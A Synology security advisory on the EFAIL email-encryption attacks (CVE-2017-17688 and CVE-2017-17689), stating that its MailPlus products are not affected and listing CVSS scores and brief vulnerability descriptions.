Synology-SA-18:22 EFAIL

Publish Time: 2018-05-15 19:16:15 UTC+8

Last Updated: 2019-12-24 14:27:10 UTC+8

Severity
Not affected
Status
Resolved

Abstract

The EFAIL attacks allow remote attackers to reveal the plaintext of encrypted emails.

Synology products are not affected because MailPlus, Android MailPlus, and iOS MailPlus do not render HTML for OpenPGP nor S/MIME messages.

Affected Products

Product Severity Fixed Release Availability
MailPlus Not affected N/A
Android MailPlus Not affected N/A
iOS MailPlus Not affected N/A

Mitigation

None

Detail

  • CVE-2017-17688

    • Severity: Moderate
    • CVSS3 Base Score: 5.3
    • CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    • ** DISPUTED ** The OpenPGP specification allows a Cipher Feedback Mode (CFB) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL. NOTE: third parties report that this is a problem in applications that mishandle the Modification Detection Code (MDC) feature or accept an obsolete packet type, not a problem in the OpenPGP specification.
  • CVE-2017-17689

    • Severity: Moderate
    • CVSS3 Base Score: 5.3
    • CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    • The S/MIME specification allows a Cipher Block Chaining (CBC) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL.

Reference

Revision

Revision Date Description
1 2018-05-15 Initial public release.
2 2019-12-24 Disclosed vulnerability details.